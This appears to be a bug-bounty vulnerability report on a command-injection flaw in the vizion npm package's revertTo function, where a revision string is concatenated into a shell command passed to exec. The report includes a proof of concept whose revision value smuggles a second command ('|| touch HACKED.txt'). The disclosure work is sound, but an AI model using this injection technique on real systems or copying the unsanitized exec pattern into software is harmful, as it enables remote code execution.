The issue is an RCE
triggerable via the module.
This is possible because in the https://github.com/keymetrics/vizion/blob/master/lib/git/git.js#L228 line, the git reset --hard
command is concatenated with a unsanitized input:
var command = cliCommand(args.folder, "git reset --hard " + args.revision);
The command
variable is so passed to the exec
function, declared as:
var exec = require('child_process').exec;
This makes possible any attacker to control the revision
attribute passed as object
in the <vizion_object>.revertTo()
function, leading to the RCE impact
.
git
environmentmkdir vizion # Makes a new directory where initialize *git*
cd vizion
git init
echo "TEST_STRING" > test.txt # Create a file named "test.txt"
git add test.txt # Adding to the working tree the new file
git commit
vizion
directory):// poc.js
var vizion = require('vizion');
vizion.revertTo({
revision : 'f0a1d45936cf7a3c969e4caba96546fd23255796 || touch HACKED.txt', folder : '.' },
function(err, data) {
console.log(data);
});
poc.js
file: node poc.js
HACKED.txt
will be created {F580132}